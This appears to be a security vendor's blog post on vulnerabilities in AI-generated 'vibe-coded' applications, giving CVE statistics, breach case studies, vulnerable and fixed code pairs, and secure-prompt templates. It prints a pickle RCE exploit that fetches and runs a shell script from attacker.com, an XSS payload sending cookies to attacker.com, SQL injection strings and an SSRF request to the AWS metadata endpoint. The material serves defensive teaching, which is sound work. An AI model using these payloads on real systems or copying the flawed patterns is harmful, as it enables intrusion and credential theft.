35 CVEs in March Alone. Real Exploits. Real Breaches. And Your AI Assistant Has No Idea.
By the Security Research Team at Precogs.ai — March 2026
"A year ago, most developers used AI for autocomplete. Now people are vibe coding entire projects, shipping code they've barely read. That's a different risk profile entirely."
— Hanqing Zhao, Georgia Tech SSLab, March 2026
Vibe coding is the most significant shift in software development in a generation. It is also, right now, producing a measurable, accelerating wave of exploitable vulnerabilities that are reaching production systems faster than any security team can track.
The numbers are no longer theoretical. In March 2026 alone, at least 35 new CVE entries were disclosed that were the direct result of AI-generated code — up from 6 in January and 15 in February. Security firm Tenzai tested 5 major AI coding tools by building 3 identical applications with each, and found 69 vulnerabilities across all 15 apps. Every single tool introduced Server-Side Request Forgery vulnerabilities. Zero apps built CSRF protection. Zero apps set security headers. Escape.tech scanned 5,600 publicly deployed vibe-coded applications and found 2,000+ vulnerabilities and 400+ exposed secrets.
This is not a warning about a future risk. This is a post-mortem on a crisis that is already happening — with real breaches, real CVEs, and real data sitting exposed on the internet right now because a founder trusted an AI assistant to build something production-safe and no one checked.
This blog is for every developer, security engineer, and engineering leader who is using AI coding tools, shipping AI-generated code, or responsible for a product where either of those is true. Which, in 2026, is nearly everyone.
Table of Contents
- What Is Vibe Coding — And Why Is It a Security Problem Now
- The Data: CVE Counts, Breach Numbers, and What They Actually Mean
- The Moltbook Incident: A Real Breach, Built Entirely by AI
- Why AI Tools Generate Insecure Code — The Structural Reasons
- The Pickle RCE: When a Snake Game Becomes a Backdoor
- Injection Flaws in AI-Generated Code: The Classics Never Die
- Broken Authentication and Authorization: The Most Common AI Failure
- The Hallucinated Package Problem: Supply Chain Attacks by Proxy
- Missing Security Headers: The Invisible Defaults
- SSRF in Every App: The 100% Failure Rate
- Business Logic Gaps: What AI Can Never Know
- The Amazon Incident: When Vibe Coding Hits Production at Scale
- How to Prompt Your AI for Secure Code
- How Precogs.ai Catches What Your AI Assistant Ships
- A Secure Vibe Coding Workflow
- Conclusion: The Vibe Is Not the Problem. The Gap Is.
1. What Is Vibe Coding — And Why Is It a Security Problem Now
When Andrej Karpathy coined the term "vibe coding" in February 2025, he described a state where developers "fully give in to the vibes" — describing what they want in natural language, accepting whatever the LLM generates, and shipping without deep review. Collins English Dictionary named it Word of the Year. Within 18 months it had moved from a curiosity to the dominant development paradigm for a significant fraction of the software being shipped in 2026.
The workflow is seductive in its simplicity:
Prompt: "Build me a REST API for a SaaS app with user registration,
login, subscription management via Stripe, and a dashboard
showing usage metrics. Use FastAPI and PostgreSQL."
→ AI generates ~2,000 lines of code in 30 seconds
→ Developer reviews: "Looks good, tests pass"
→ Code ships to production
The problem is not the speed. The problem is the gap between "tests pass" and "is secure." These are not the same thing — and AI coding tools generate entire applications from scratch in a black box: you don't see how the model weighs different implementation choices or what assumptions it makes about security. The code can bypass the review and testing workflows that catch problems in traditional development.
When a human developer writes a login function, every security decision is visible and explicit. When an AI writes it, those decisions are implicit — embedded in training data patterns that optimize for functionality, not security. AI coding tools can reproduce insecure patterns from training data or generate flawed logic under pressure to produce fast results, leading to injection flaws, weak authentication, broken authorization, and unsafe handling of sensitive data.
The shift that makes 2026 different from 2024 is not that AI-generated code became less secure. It is that the scale and autonomy changed. A year ago, developers used AI for autocomplete suggestions. Today, entire projects — authentication systems, payment integrations, database schemas, API layers — are being generated end-to-end and shipped with minimal human review. The risk profile is categorically different.
2. The Data: CVE Counts, Breach Numbers, and What They Actually Mean
Georgia Tech's Systems Software & Security Lab launched the Vibe Security Radar in May 2025 to track exactly this phenomenon. The methodology is rigorous: pull CVEs from public vulnerability databases, find the commit that fixed each vulnerability, trace backwards to find who introduced the bug, and flag it if the introducing commit has an AI tool's signature.
As of March 20, 2026, the CVE scorecard reads 74 CVEs attributable to AI-authored code, out of 43,849 advisories analyzed. In March 2026 alone: 27 CVEs authored by Claude Code, 4 by GitHub Copilot, 2 by Devin, and 1 each by Aether and Cursor.
Claude Code's prominence in these numbers requires context. Claude Code's overrepresentation appears to follow from its recent surge in popularity and the fact that it always leaves a signature. Tools like Copilot's inline suggestions leave no trace at all, so they're harder to catch.
The 74 confirmed CVEs are almost certainly a massive undercount. Georgia Tech researcher Hanqing Zhao estimates the real number is likely 5 to 10 times higher than what they currently detect — roughly 400 to 700 cases across the open-source ecosystem. Take OpenClaw as an example: it has more than 300 security advisories and appears to have been heavily vibe-coded, but most AI traces have been stripped away. We can only confidently confirm around 20 cases with clear AI signals.
Beyond CVEs, the picture from application scanning is even more alarming:
- Carnegie Mellon found that 61% of AI-generated code is functionally correct but only 10.5% is fully secure
- CodeRabbit's December 2025 study found vibe-coded PRs produced 1.7 times more major issues, up to 2.7 times more XSS vulnerabilities, and a 23.5% increase in production incidents per pull request
- Escape.tech discovered 2,000+ vulnerabilities and 400+ exposed secrets in 5,600 publicly deployed vibe-coded applications
3. The Moltbook Incident: A Real Breach, Built Entirely by AI
Theory becomes real with Moltbook — and this case study should be required reading for every founder using vibe coding tools.
In February 2026, Moltbook — a social networking site for AI agents — made international security news. The entire platform had been built through vibe coding. The founder publicly said he wrote zero lines of code himself. Security firm Wiz discovered a misconfigured Supabase database that had been left with public read and write access. The exposure included 1.5 million authentication tokens and 35,000 email addresses — all wide open to the internet.
The root cause was not a sophisticated attack. The AI scaffolded the database with permissive settings during development and the founder — who hadn't reviewed the infrastructure code — deployed it as-is.
This is the accountability gap that defines the vibe coding security crisis. When a vulnerability is found six months later in AI-generated code, there's no author to ask "why did you do it this way?" — because no human made that decision. The AI did. And the AI doesn't document its reasoning.
The specific failure in Moltbook's case was a Supabase Row Level Security configuration:
-- What the AI generated (DANGEROUS default):
-- No RLS policies created. Table accessible to anon role by default.
CREATE TABLE user_sessions (
id UUID PRIMARY KEY DEFAULT gen_random_uuid(),
user_id UUID REFERENCES users(id),
token TEXT NOT NULL,
created_at TIMESTAMPTZ DEFAULT NOW()
);
-- Supabase's anon key has SELECT access to all tables without RLS policies
-- Result: 1.5 million session tokens readable by anyone with the anon key
-- What it should have looked like:
-- Enable Row Level Security immediately
ALTER TABLE user_sessions ENABLE ROW LEVEL SECURITY;
-- Users can only read their own sessions
CREATE POLICY "Users can view own sessions"
ON user_sessions FOR SELECT
USING (auth.uid() = user_id);
-- Service role only for writes
CREATE POLICY "Service role can insert sessions"
ON user_sessions FOR INSERT
WITH CHECK (auth.role() = 'service_role');
The AI generated a working session management system. It did not generate a secure one. And without a developer who understood Supabase's security model, the difference was invisible until Wiz's scanner found it.
4. Why AI Tools Generate Insecure Code, The Structural Reasons
Understanding why AI coding tools produce insecure code is essential to knowing where to look for the problems they introduce.
4.1 Training Data Reflects the Internet — Which Is Insecure
AI coding models are trained on vast corpora of public code. The internet is full of tutorials, Stack Overflow answers, and example code that prioritizes getting something working quickly over getting it working securely. Insecure patterns — SQL string concatenation, hardcoded secrets in examples, missing input validation in tutorials — are well-represented in training data. The model learns to produce outputs that look like the code it was trained on.
4.2 Optimization Target Is Functionality, Not Security
Vibe coding optimizes for features, not permissions. Access control is an architectural decision that gets made implicitly by the AI — and those implicit decisions are often wrong. The model is evaluated on "does this code work?" not "is this code secure?" These are different evaluation criteria with different outputs.
4.3 No Business Context
AI has no knowledge of your specific threat model, your user base's risk profile, your regulatory requirements, or your business logic invariants. Because AI lacks an understanding of your specific business logic, it can build applications that technically work but violate domain rules, regulatory requirements, or customer trust.
4.4 Security Is Often Invisible to the Model
Many security properties are defined by what's absent — a missing rate limit, a missing ownership check, a missing CSRF token, a missing security header. AI models are better at generating present things than noticing absent things. The generated code looks complete because it has all the features. The security holes are invisible because there's nothing to see.
4.5 The "Looks Good" Trap
AI-generated code is syntactically clean, well-structured, and passes basic linting. It looks more professional than hastily written human code. This creates a cognitive trap where developers extend more trust to it than it deserves. A messy function written by a junior developer triggers review instincts. A beautifully formatted AI-generated function lulls them to sleep.
5. The Pickle RCE: When a Snake Game Becomes a Backdoor
The Databricks AI Red Team's Snake game experiment is one of the most illustrative examples of how vibe coding produces invisible vulnerabilities.
When they asked Claude to build a multiplayer snake game, the AI-generated network layer used Python's pickle module to serialize and deserialize game objects — a module notorious for enabling arbitrary remote code execution. The app ran perfectly. The vulnerability was invisible to anyone who didn't already know about pickle exploits.
Here is exactly what the AI generated and why it is catastrophic:
#AI-generated multiplayer Snake game network layer
#telnyx/_client.py — DANGEROUS: pickle for network serialization
import socket
import pickle
import threading
class GameServer:
def __init__(self, host='0.0.0.0', port=9999):
self.server = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
self.server.bind((host, port))
self.server.listen(5)
self.players = {}
def handle_client(self, conn, addr):
while True:
data = conn.recv(4096)
if not data:
break
# CRITICAL VULNERABILITY: Deserializing untrusted network data with pickle
# Any connected client can send a crafted payload for RCE
game_state = pickle.loads(data) # ← Arbitrary code execution here
self.update_game(game_state)
def send_state(self, conn, state):
conn.sendall(pickle.dumps(state)) # ← Also dangerous on receive side
An attacker who can connect to this game server — which listens on 0.0.0.0, meaning all interfaces — can send a crafted pickle payload:
#Attacker's exploit: craft a malicious pickle payload
import pickle
import os
import socket
class RCEPayload:
def __reduce__(self):
#This executes on the SERVER when pickle.loads() is called
return (os.system, ("curl http://attacker.com/shell.sh | bash",))
#Serialize the malicious payload
malicious_data = pickle.dumps(RCEPayload())
#Send to game server
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.connect(('target-game-server.com', 9999))
sock.sendall(malicious_data)
#Server executes: curl http://attacker.com/shell.sh | bash
#Full remote code execution achieved
The fix is trivial — use JSON instead of pickle for network serialization:
#SAFE: JSON serialization for network data
import json
class GameServer:
def handle_client(self, conn, addr):
while True:
data = conn.recv(4096)
if not data:
break
try:
#JSON cannot execute arbitrary code on deserialization
game_state = json.loads(data.decode('utf-8'))
#Validate the structure before processing
if not self._validate_game_state(game_state):
continue
self.update_game(game_state)
except (json.JSONDecodeError, KeyError, ValueError):
continue # Reject malformed input
def _validate_game_state(self, state: dict) -> bool:
required_keys = {'player_id', 'direction', 'position'}
return (
isinstance(state, dict) and
required_keys.issubset(state.keys()) and
state['direction'] in ('up', 'down', 'left', 'right')
)
The fix was simple — switch from pickle to JSON — but only once the team caught the issue during review. Without that review, a malicious client could have executed arbitrary code on any game server.
This is the vibe coding security gap in its purest form: the AI produced working code. The working code was also a perfect RCE backdoor. A security review caught it. Without that review, it ships.
6. Injection Flaws in AI-Generated Code: The Classics Never Die
Ask a model to generate a login function, and you may receive something syntactically perfect, yet riddled with flaws — from hardcoded credentials to unvalidated inputs. A session cookie without the HttpOnly or Secure flag is an open invitation for hijacking. A dynamic SQL query built from unchecked user input is a textbook example of an injection vulnerability.
6.1 SQL Injection — Still Appearing in AI Code in 2026
#What AI tools frequently generate for search endpoints:
@app.route('/api/search')
def search_users():
query = request.args.get('q', '')
#DANGEROUS: String interpolation directly into SQL
sql = f"SELECT id, name, email FROM users WHERE name LIKE '%{query}%'"
results = db.execute(sql).fetchall()
return jsonify([dict(r) for r in results])
Attacker input: q='; DROP TABLE users; --
Result: Table dropped. Or: q=' UNION SELECT id, password_hash, ssn FROM users WHERE '1'='1 — full table dump including password hashes.
#SAFE: Parameterized query — what the AI should have generated
@app.route('/api/search')
def search_users():
query = request.args.get('q', '')
#Parameterized — user input never interpreted as SQL
results = db.execute(
"SELECT id, name, email FROM users WHERE name LIKE ?",
(f'%{query}%',)
).fetchall()
return jsonify([dict(r) for r in results])
6.2 XSS in AI-Generated React Components
// AI-generated component — DANGEROUS: dangerouslySetInnerHTML with user content
function UserProfile({ user }) {
return (
<div className="profile">
<h1>{user.name}</h1>
{/* AI chose this for "rich text" support — XSS vector */}
<div dangerouslySetInnerHTML={{ __html: user.bio }} />
</div>
);
}
An attacker whose bio is <script>document.cookie='stolen='+document.cookie;fetch('https://attacker.com?c='+document.cookie)</script> now steals every visitor's session cookie.
// SAFE: Sanitize before rendering, or avoid dangerouslySetInnerHTML
import DOMPurify from 'dompurify';
function UserProfile({ user }) {
// DOMPurify strips all executable content before rendering
const cleanBio = DOMPurify.sanitize(user.bio);
return (
<div className="profile">
<h1>{user.name}</h1>
<div dangerouslySetInnerHTML={{ __html: cleanBio }} />
</div>
);
}
7. Broken Authentication and Authorization: The Most Common AI Failure
Authorization logic was the most common failure in Tenzai's study. Codex skipped validation for non-shopper roles completely. Claude Code generated code that checked authentication but skipped all permission validation when users weren't logged in, enabling unrestricted product deletion.
This is the distinction between authentication ("are you who you say you are?") and authorization ("are you allowed to do this?") — and AI tools consistently conflate them or skip the latter.
7.1 The Missing Ownership Check
// AI-generated endpoint — DANGEROUS: authenticated but not authorized
app.delete('/api/posts/:id', requireAuth, async (req, res) => {
// Checks: is the user logged in? ✓
// Checks: does this user OWN this post? ✗
const post = await Post.findById(req.params.id);
if (!post) return res.status(404).json({ error: 'Not found' });
await post.deleteOne();
res.json({ success: true });
// Any authenticated user can delete any post
});
// SAFE: Authentication + authorization
app.delete('/api/posts/:id', requireAuth, async (req, res) => {
const post = await Post.findOne({
_id: req.params.id,
author: req.user.id // Ownership check — only the author can delete
});
if (!post) return res.status(404).json({ error: 'Not found' });
await post.deleteOne();
res.json({ success: true });
});
7.2 Insecure Session Cookies
#AI-generated Flask session configuration — dangerous defaults
app = Flask(__name__)
app.secret_key = 'dev_secret_key_123' # Hardcoded weak key
@app.route('/login', methods=['POST'])
def login():
# ... authentication logic ...
session['user_id'] = user.id
return redirect('/')
#Missing: SESSION_COOKIE_SECURE = True → cookie sent over HTTP (interceptable)
#Missing: SESSION_COOKIE_HTTPONLY = True → cookie readable by JS (XSS theft)
#Missing: SESSION_COOKIE_SAMESITE = 'Lax'→ CSRF vulnerable
#Present: hardcoded weak secret key → sessions forgeable
#SAFE: Explicit, secure session configuration
app = Flask(__name__)
app.config.update(
SECRET_KEY=os.environ['SECRET_KEY'], # Strong random key from env
SESSION_COOKIE_SECURE=True, # HTTPS only
SESSION_COOKIE_HTTPONLY=True, # No JS access
SESSION_COOKIE_SAMESITE='Lax', # CSRF protection
PERMANENT_SESSION_LIFETIME=timedelta(hours=24)# Reasonable expiry
)
7.3 The Business Logic Authorization Gap
Four of five AI tools allowed negative order quantities. Three allowed negative product prices. These aren't obscure edge cases — they're the first thing a human QA tester checks.
#AI-generated order endpoint — business logic flaws
@app.route('/api/orders', methods=['POST'])
@require_auth
def create_order():
data = request.json
#AI validates types but not business rules
quantity = int(data['quantity']) # Could be -100
price = float(data['unit_price']) # Could be -9999.99
total = quantity * price # Negative order = store pays you
order = Order.create(
user_id=current_user.id,
quantity=quantity,
unit_price=price,
total=total
)
charge_stripe(current_user, total) # Charging -$999? Stripe refunds you.
return jsonify(order.to_dict())
#SAFE: Enforce business invariants explicitly
@app.route('/api/orders', methods=['POST'])
@require_auth
def create_order():
data = request.json
quantity = int(data['quantity'])
product_id = data['product_id']
# Business invariants — never trust client-supplied pricing
if quantity <= 0 or quantity > 1000:
return jsonify({'error': 'Invalid quantity'}), 400
# Price comes from the database, not the client
product = Product.query.get_or_404(product_id)
if not product.is_available:
return jsonify({'error': 'Product unavailable'}), 400
total = quantity * product.price # Server-authoritative pricing
order = Order.create(
user_id=current_user.id,
quantity=quantity,
product_id=product_id,
total=total
)
charge_stripe(current_user, total)
return jsonify(order.to_dict())
8. The Hallucinated Package Problem: Supply Chain Attacks by Proxy
AI models sometimes hallucinate package names. They recommend libraries that sound real but don't exist — or worse, exist but are malicious packages registered to catch exactly this scenario.
This is a supply chain attack enabled by AI without any attacker involvement in the generation step. The attack chain:
- Developer prompts AI: "Add email validation to my Node.js app"
- AI suggests:
npm install validator-utils-express(a hallucinated package name) - Developer runs
npm installwithout checking - An attacker who registered
validator-utils-expresson npm last year gets a hit - The malicious package installs a credential harvester via
postinstallscript
#The hallucination scenario — always verify before installing
#Step 1: Before running ANY npm install or pip install from AI suggestions:
#Check if the package actually exists and has legitimate history
npm info validator-utils-express # Does it exist? Who maintains it?
npm info validator-utils-express versions # How long has it existed?
#For Python:
pip index versions some-suggested-package # Check publication history
#Step 2: Verify it's the package you expect
#Look for: number of downloads, GitHub repo, publish date, maintainer history
#Step 3: Prefer well-known, highly downloaded packages
#Instead of AI-suggested obscure packages, use:
#-npm: validator (24M weekly downloads, not validator-utils-express)
#-Python: email-validator (well-established, not ai-suggested-email-utils)
Vibe coding tools also tend to leave dependency versions unpinned, which means a compromised update can silently enter a project without any code change on the developer's side. These risks are invisible to application-level security scanners because the vulnerability is in the dependency, not in the code that imports it.
// What AI generates (dangerous):
{
"dependencies": {
"express": "^4.18.0", // ^ means "accept any compatible update"
"mongoose": "^7.0.0",
"validator-utils": "*" // * means "accept anything"
}
}
// What it should look like after security review:
{
"dependencies": {
"express": "4.18.3", // Exact version pin
"mongoose": "7.6.3", // Exact version pin
"validator": "13.11.0" // Established package, exact pin
}
}
9. Missing Security Headers: The Invisible Defaults
Zero of 15 apps built by AI tools set CSP, X-Frame-Options, HSTS, X-Content-Type-Options, or proper CORS. Security headers are purely additive — they require no functional change to the application — yet AI consistently omits them because they are not visible in tests, not required for functionality, and not represented in "build me an app" training examples.
#AI-generated Flask app — no security headers
@app.route('/')
def index():
return render_template('index.html')
#No HSTS, no CSP, no X-Frame-Options, no referrer policy
#SAFE: Helmet-equivalent for Flask using flask-talisman
from flask_talisman import Talisman
Talisman(app,
force_https=True, # HSTS
strict_transport_security=True,
strict_transport_security_max_age=31536000,
content_security_policy={
'default-src': "'self'",
'script-src': ["'self'", 'cdn.trusted.com'],
'style-src': ["'self'", "'unsafe-inline'"],
'img-src': "'self' data:",
},
frame_options='DENY', # X-Frame-Options: DENY (clickjacking)
referrer_policy='strict-origin'
)
// For Express: AI generates bare app, add helmet immediately
import helmet from 'helmet';
const app = express();
// One line adds 11 security headers
app.use(helmet({
contentSecurityPolicy: {
directives: {
defaultSrc: ["'self'"],
scriptSrc: ["'self'"],
styleSrc: ["'self'", "'unsafe-inline'"],
}
},
hsts: { maxAge: 31536000, includeSubDomains: true },
frameguard: { action: 'deny' },
noSniff: true,
xssFilter: true
}));
10. SSRF in Every App: The 100% Failure Rate
The most alarming single finding from Tenzai's study: every single AI coding tool introduced Server-Side Request Forgery vulnerabilities in a URL preview feature, allowing attackers to invoke requests to arbitrary internal URLs, access internal services, bypass firewalls, and leak credentials.
Five out of five. One hundred percent.
#AI-generated URL preview feature — SSRF in every version tested
@app.route('/api/preview')
@require_auth
def preview_url():
url = request.args.get('url')
#DANGEROUS: Fetching user-supplied URLs without any validation
response = requests.get(url, timeout=5)
#Attacker sends: url=http://169.254.169.254/latest/meta-data/iam/security-credentials/
#Result: AWS IAM credentials exfiltrated
return jsonify({
'title': extract_title(response.text),
'description': extract_description(response.text)
})
#SAFE: Strict URL validation preventing SSRF
import ipaddress
import socket
from urllib.parse import urlparse
ALLOWED_SCHEMES = {'http', 'https'}
PRIVATE_RANGES = [
ipaddress.ip_network('10.0.0.0/8'),
ipaddress.ip_network('172.16.0.0/12'),
ipaddress.ip_network('192.168.0.0/16'),
ipaddress.ip_network('127.0.0.0/8'),
ipaddress.ip_network('169.254.0.0/16'), # AWS metadata
ipaddress.ip_network('::1/128'),
ipaddress.ip_network('fc00::/7'),
]
def is_safe_url(url: str) -> bool:
try:
parsed = urlparse(url)
if parsed.scheme not in ALLOWED_SCHEMES:
return False
if not parsed.hostname:
return False
# Resolve hostname to IP
ip_str = socket.gethostbyname(parsed.hostname)
ip = ipaddress.ip_address(ip_str)
# Reject private, loopback, and link-local addresses
for private_range in PRIVATE_RANGES:
if ip in private_range:
return False
return True
except Exception:
return False
@app.route('/api/preview')
@require_auth
def preview_url():
url = request.args.get('url')
if not is_safe_url(url):
return jsonify({'error': 'URL not allowed'}), 400
response = requests.get(url, timeout=5, allow_redirects=False)
return jsonify({
'title': extract_title(response.text),
'description': extract_description(response.text)
})
11. Business Logic Gaps: What AI Can Never Know
There is a category of vulnerability that no amount of AI improvement will solve — at least not without deep domain context. Business logic vulnerabilities arise from the gap between what the code allows and what the business rules require. The AI has no knowledge of your business rules unless you explicitly specify them.
#AI-generated subscription management — logic gaps everywhere
@app.route('/api/subscribe', methods=['POST'])
@require_auth
def subscribe():
plan_id = request.json['plan_id']
plan = Plan.query.get(plan_id)
#AI creates a working subscription — but misses:
#-Can this user downgrade mid-cycle? (proration logic)
#-Can a user have multiple active subscriptions?
#-What happens if payment fails — immediate cutoff or grace period?
#-Is this plan available in the user's geographic region?
#-Is the user already on a trial that would be invalidated?
#-Are there usage limits that need to be enforced at subscription time?
subscription = create_stripe_subscription(current_user, plan)
return jsonify({'subscription_id': subscription.id})
None of these gaps appear as errors. The code works. The business logic is just wrong — and wrong in ways that can be exploited (free access via trial manipulation), that violate regulations (selling restricted plans in restricted regions), or that create financial exposure (proration errors at scale).
The AI doesn't know your business. You have to tell it explicitly, check its output explicitly, and test the edge cases explicitly.
12. The Amazon Incident: When Vibe Coding Hits Production at Scale
The most financially significant vibe coding failure to date was not a startup. It was Amazon.
After mandating 80% weekly usage of its AI coding assistant Kiro, Amazon suffered a six-hour outage that knocked out checkout, login, and product pricing, costing an estimated 6.3 million orders.
The outage traced to AI-generated infrastructure code that passed all tests in staging but exhibited a race condition under production load — exactly the class of vulnerability that only manifests at scale, under concurrent access patterns that no test environment replicates.
The same failure pattern is now emerging in security operations. The National Vulnerability Database has over 30,000 CVEs backlogged. More vulnerable code in production means more alerts. More pressure means more temptation to accept AI-generated triage without review. The feedback loop is self-reinforcing.
If Amazon — with thousands of engineers, world-class SRE practices, and multi-stage deployment pipelines — can suffer a six-hour production outage from vibe-coded infrastructure, the implications for startups and scale-ups shipping AI-generated code with minimal review are severe.
13. How to Prompt Your AI for Secure Code
The good news: prompting techniques such as self-reflection, language-specific prompts, and generic security prompts significantly reduce insecure code generation. The AI is not intentionally producing insecure code. It is following the path of least resistance in its training. You can redirect that path with the right prompts.
Security-First Prompt Templates
❌ WEAK PROMPT:
"Build a user authentication system with JWT tokens"
✅ SECURITY-AWARE PROMPT:
"Build a user authentication system with JWT tokens. Requirements:
- Use bcrypt (rounds=12) for password hashing
- JWT tokens must expire in 15 minutes, use refresh tokens with 7-day expiry
- Refresh tokens must be stored server-side (Redis) and invalidatable
- Rate limit login attempts: 5 per IP per 15 minutes, 10 per account per hour
- All tokens must be transmitted over HTTPS only (set Secure cookie flag)
- HttpOnly and SameSite=Lax on all cookies
- Account lockout after 10 failed attempts with exponential backoff
- Log all authentication events for audit trail
- What are the security risks in your implementation, and how have you mitigated each?"
❌ WEAK PROMPT:
"Add a file upload feature"
✅ SECURITY-AWARE PROMPT:
"Add a file upload feature with these security requirements:
- Whitelist allowed MIME types: image/jpeg, image/png, application/pdf only
- Maximum file size: 10MB
- Validate MIME type from file content (not just extension)
- Store files outside the web root with UUID filenames (no user-supplied names)
- Scan uploads with ClamAV before storing
- Generate pre-signed S3 URLs for access (never serve files directly)
- Explain what path traversal attacks are and how your implementation prevents them"
❌ WEAK PROMPT:
"Create an API endpoint that fetches external URLs for link previews"
✅ SECURITY-AWARE PROMPT:
"Create an API endpoint for link previews. It must prevent SSRF attacks by:
- Validating the URL scheme (https only)
- Resolving the hostname to an IP and rejecting private ranges (RFC1918, loopback, link-local, AWS metadata 169.254.169.254)
- Setting a strict timeout (3 seconds max)
- Following zero redirects
- Explain each SSRF vector your implementation defends against"
The Security Self-Review Prompt
After generating any security-sensitive code, always follow up with:
"Review the code you just generated for the following vulnerability classes
and tell me specifically if any are present:
1. Injection (SQL, NoSQL, command, LDAP)
2. Broken authentication or authorization
3. Sensitive data exposure (logging, API responses, error messages)
4. SSRF or arbitrary URL fetching
5. Insecure deserialization
6. Missing rate limiting
7. Hardcoded credentials or secrets
8. Missing input validation
9. Insecure dependencies
For each class: either confirm it's not present (and explain why),
or identify the specific line and provide the fix."
This forces the model to perform a structured security review of its own output — and significantly improves the security of what it produces.
14. How Precogs.ai Catches What Your AI Assistant Ships
The most important insight from the vibe coding security data is this: the vulnerabilities AI tools produce are not new. They are the same vulnerability classes that have been in the OWASP Top 10 for a decade. SQL injection. Broken access control. Security misconfiguration. Insecure deserialization. SSRF.
What is new is the scale and velocity at which they are being introduced. A single developer using Claude Code can generate 10,000 lines of code per day. A traditional security review process built for human-speed development cannot keep up.
Precogs.ai is built for exactly this environment — AI-native security analysis that operates at the speed of AI-generated code.
14.1 AI-Aware Static Analysis
Precogs.ai's analysis engine is tuned for the specific patterns that AI tools produce — the subtle authorization gaps, the missing ownership checks, the SSRF-enabling URL fetchers, the business logic omissions that scanners built for human-written code were not designed to catch.
When your CI/CD pipeline runs after a Claude Code or Cursor session, Precogs.ai doesn't just check the new code against known vulnerability signatures. It performs inter-procedural data flow analysis — tracing user-controlled input from HTTP endpoints through every transformation to every security-sensitive sink.
#Precogs.ai detects this even when the SSRF is three function calls deep:
def get_preview_data(url): # Function 1: entry point
content = fetch_content(url) # Function 2: passes url through
return parse_og_tags(content)
def fetch_content(target_url):
return requests.get(target_url).text #Function 3: SSRF sink — flagged
#Classic SAST sees three separate functions and misses the connection.
#Precogs.ai traces the taint from user input in get_preview_data()
#through fetch_content() to requests.get() — and flags it with:
#"User-controlled URL reaches requests.get() without SSRF validation.
#Attack path: /api/preview → get_preview_data() → fetch_content() → requests.get()"
14.2 Dependency Hallucination Detection
Precogs.ai cross-references every package in your requirements.txt, package.json, and Cargo.toml against:
- Publication age (packages less than 30 days old with no GitHub history are flagged)
- Download velocity (sudden spikes suggesting a squatting campaign)
- Maintainer reputation and transfer history
- Known malicious package databases
- TeamPCP and other active campaign IoC feeds
A newly registered package that the AI suggested but that has no legitimate history gets flagged before you install it.
14.3 Business Logic Baseline Modeling
Precogs.ai builds a model of your application's access control patterns — which endpoints check ownership, which roles can access which resources, which numeric fields have business-rule validations. When new AI-generated code is added that creates an endpoint matching the pattern of existing endpoints but missing the authorization checks that existing endpoints have, it is flagged as a likely authorization gap.
14.4 PR-Level Security Review at AI Speed
Every pull request from a vibe coding session gets a Precogs.ai review posted as inline GitHub comments — before the code is merged, in the context where the developer is already looking at it.
[Precogs.ai] 🔴 HIGH — Missing Object-Level Authorization (CWE-639)
PR: feat/ai-dashboard — generated by Claude Code
Line 47: routes/dashboard.js
User-controlled parameter `req.params.userId` reaches
User.findById() without verification that req.user.id === req.params.userId.
This pattern was detected in 3 of 7 new endpoints in this PR.
Attack: Any authenticated user can access any other user's dashboard
by substituting a different userId in the URL.
Fix: Replace User.findById(req.params.userId) with
User.findById(req.user.id) — or add explicit ownership check.
[View all 3 affected endpoints →]
15. A Secure Vibe Coding Workflow
Vibe coding is not going away. The productivity gains are real. The right response is not to stop using AI tools — it is to build a workflow that closes the security gap between what the AI generates and what you ship.
┌─────────────────────────────────────────────────────────────────┐
│ SECURE VIBE CODING WORKFLOW │
├─────────────────────────────────────────────────────────────────┤
│ │
│ 1. PROMPT WITH SECURITY REQUIREMENTS │
│ Include explicit security specs in every prompt │
│ Ask for self-review: "What are the security risks?" │
│ │
│ 2. VERIFY DEPENDENCIES BEFORE INSTALLING │
│ Check every suggested package exists legitimately │
│ Run: npm audit / pip-audit after AI adds dependencies │
│ Pin exact versions in requirements files │
│ │
│ 3. AUTOMATED SCAN ON EVERY COMMIT (Precogs.ai) │
│ SAST: injection, auth gaps, SSRF, misconfigurations │
│ Dependency: CVEs, hallucinated packages, supply chain │
│ Secrets: API keys, credentials in generated code │
│ │
│ 4. HUMAN REVIEW FOR SECURITY-SENSITIVE PATHS │
│ Authentication flows → always human review │
│ Payment/financial logic → always human review │
│ Database schema + access policies → always human review │
│ Infrastructure code → always human review │
│ │
│ 5. DYNAMIC TESTING BEFORE PRODUCTION │
│ Test auth bypass: remove token, use expired token │
│ Test IDOR: create two accounts, access each other's data │
│ Test business logic: negative quantities, zero prices │
│ Test security headers: securityheaders.com │
│ │
│ 6. MONITOR CONTINUOUSLY IN PRODUCTION (Precogs.ai) │
│ New CVEs in your dependencies → immediate alert │
│ Anomalous API traffic patterns → behavioral detection │
│ New shadow endpoints → API inventory drift detection │
│ │
└─────────────────────────────────────────────────────────────────┘
16. Conclusion: The Vibe Is Not the Problem. The Gap Is.
The vibe coding security crisis is not evidence that AI coding tools are bad or that developers who use them are reckless. It is evidence that the security verification layer has not kept pace with the generation layer.
Applications built with vibe coding tools are no more inherently risky than applications built with traditional tools. The problem is that the vibe coding workflow encourages fast shipping without testing, and the default outputs of these tools reflect that pressure: code that works functionally but omits defensive patterns.
The gap is the problem. The gap between "AI generated it" and "we verified it is secure." The gap between "the tests pass" and "the authorization is correct." The gap between "it works in staging" and "it is safe in production."
Most security programs were built for a world where code moved at human speed. Vibe coding changes that. AI can generate, modify, and refactor code continuously, which means security teams are no longer dealing with occasional bursts of change.
Precogs.ai closes the gap — operating at AI speed, with AI-aware analysis, built for the era of vibe coding. Because the future of software development is AI-assisted. And the future of security has to be too.
Scan Your Vibe-Coded Codebase
Get your first AI code security audit at precogs.ai →
Connect your repository in under 5 minutes. Get a prioritized report of the security gaps your AI assistant left behind — before an attacker finds them.
© 2026 Precogs.ai — AI-Native Application Security. All rights reserved.
Statistics in this article are sourced from Georgia Tech SSLab Vibe Security Radar (March 2026), Tenzai security research (December 2025), Escape.tech application scanning report (2025-2026), Carnegie Mellon AI code security study, and CodeRabbit production incident analysis (December 2025).
Tags: vibe-coding AI-generated-code code-security CVE Claude-Code Cursor Copilot OWASP injection SSRF supply-chain precogs-ai DevSecOps 2026

Top comments (0)